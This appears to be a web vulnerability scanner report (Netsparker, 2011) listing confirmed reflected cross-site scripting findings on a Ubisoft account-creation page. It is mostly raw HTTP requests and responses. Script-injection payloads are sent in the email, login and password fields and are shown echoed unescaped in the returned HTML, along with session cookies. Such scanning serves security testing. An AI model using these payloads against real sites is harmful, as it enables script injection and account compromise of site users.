__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005B3)%3c%2fscript%3e&birthdate=------&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39976


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x0005B3)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value=&..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST '"--></style></script><script>alert(0x0005DE)</script>
password POST 3
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST m10
country POST ag
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=wd52t445wlp1eo45uu2igi45; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 315
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005DE)%3c%2fscript%3e&password=3&confirmpassword=3&email=netsparker%40example.com&birthdate=m10&country=ag&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="'"--></style></script><script>netsparker(0x0005DE)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST '"--></style></script><script>alert(0x0005E0)</script>
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST m10
country POST ag
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=wd52t445wlp1eo45uu2igi45; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 315
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005E0)%3c%2fscript%3e&confirmpassword=3&email=netsparker%40example.com&birthdate=m10&country=ag&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
